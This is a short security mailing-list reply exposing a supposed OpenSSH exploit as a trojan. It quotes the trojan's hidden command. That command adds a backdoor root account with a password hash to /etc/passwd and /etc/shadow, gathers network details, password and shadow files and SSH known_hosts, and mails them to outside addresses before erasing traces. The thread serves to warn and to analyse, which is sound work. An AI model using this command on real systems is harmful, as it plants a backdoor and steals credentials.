Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!*

[Raymond Dijkxhoorn <raymond () prolocation net>]

Hi!

> > > > i looked at this piece of exploit... it is binary so i'am not sure if 
> > > > this is a trojan or a backdoor or a virus. but i can't see anything 
> > > > strange while sniffing the exploit traffic. and i got root on serveral 
> > > > of my openbsd boxes with that. the bruteforcer seems to be very good. 

> which is obviously not true. Btw as far as I understand, the troyan code is triggered when 
> the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.

He most likely means, he rooted some of hhis own boxes where he tired to 
run the 'exploit'. 

Nice piece of social engineering. 

> > > printf("[*] sending shellcode\n")= 22
> > > popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> > > "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> > > 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> > > /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
> > > find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp 
|
> > > /usr/sbin/sendmail -f ownage_at_gmx.de
> > > m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> > > 0x0804a6b0

Bye,
Raymond.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html